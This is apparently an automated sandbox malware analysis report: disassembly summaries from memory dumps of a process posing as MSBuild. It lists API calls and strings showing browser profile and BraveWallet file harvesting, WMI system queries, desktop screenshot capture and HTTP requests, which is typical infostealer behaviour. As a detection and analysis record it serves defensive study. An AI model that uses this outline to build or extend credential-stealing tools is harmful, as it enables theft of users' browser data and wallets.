• Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
• Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
• Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
• Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

Control-flow Graph
control_flow_graph 1168, first block 414cc8-414d6f (graph not preserved)
APIs
• wsprintfA.USER32 ref: 00414D1C
• FindFirstFileA.KERNEL32(?,?), ref: 00414D33
• _memset.LIBCMT ref: 00414D4F
• _memset.LIBCMT ref: 00414D60
• StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
• StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
• wsprintfA.USER32 ref: 00414DC2
• StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
• wsprintfA.USER32 ref: 00414DFF
• wsprintfA.USER32 ref: 00414E16
  • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
  • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
  • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
  • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
  • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
  • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
• _memset.LIBCMT ref: 00414E28
• lstrcatA.KERNEL32(?,?), ref: 00414E3D
• strtok_s.MSVCRT ref: 00414E82
• _memset.LIBCMT ref: 00414E94
• lstrcatA.KERNEL32(?,?), ref: 00414EA9
• strtok_s.MSVCRT ref: 00414EC2
• PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00436A28,0043661D), ref: 00414F90
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 00414FA0
                                                                                                                                                                                                                        • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00414FC1
                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00414FE7
                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00415125
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                                      • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                      • API String ID: 956187361-332874205

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0EF
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040A1BE
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A41C
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                                                                                                                                        • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                                                                                                                                                        • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                                                                                                                                        • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                                                                                                                                        • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A613
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 0040A76E
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                                                                      • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                                      • API String ID: 4173076446-1189830961

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C90F688,00001000), ref: 6C8835D5
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C8835E0
                                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 6C8835FD
                                                                                                                                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C88363F
                                                                                                                                                                                                                      • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C88369F
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C8836E4
                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6C883773
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F688), ref: 6C88377E
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8837BD
                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6C8837C4
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8837CB
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C883801
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C883883
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C883902
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C883918
                                                                                                                                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C88394C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                      • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                      • API String ID: 301339242-3790311718

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                                      • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                      • API String ID: 2178766154-445461498
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                                                                                        • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                                                                                        • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                                                                                        • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                                                                                        • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                                                                                        • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                                                                                        • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00411949
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                      • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                                      • API String ID: 2280294774-461178377
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: /$UT
                                                                                                                                                                                                                      • API String ID: 0-1626504983
                                                                                                                                                                                                                      • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                                                                                      • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                                      • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                      • API String ID: 3863758870-2509457195
                                                                                                                                                                                                                      • Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                                                                                      • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                      • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                                                                                                                                                      • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                                                                                                                                      • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                                                                        • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                                                                                        • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                                                                                                                                      • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2610876673-0
                                                                                                                                                                                                                      • Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                                                                                                                      • Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00402336
                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040264F
                                                                                                                                                                                                                        • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                      • API String ID: 1475085387-1173974218
                                                                                                                                                                                                                      • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                                                                                      • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041546A
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00415520
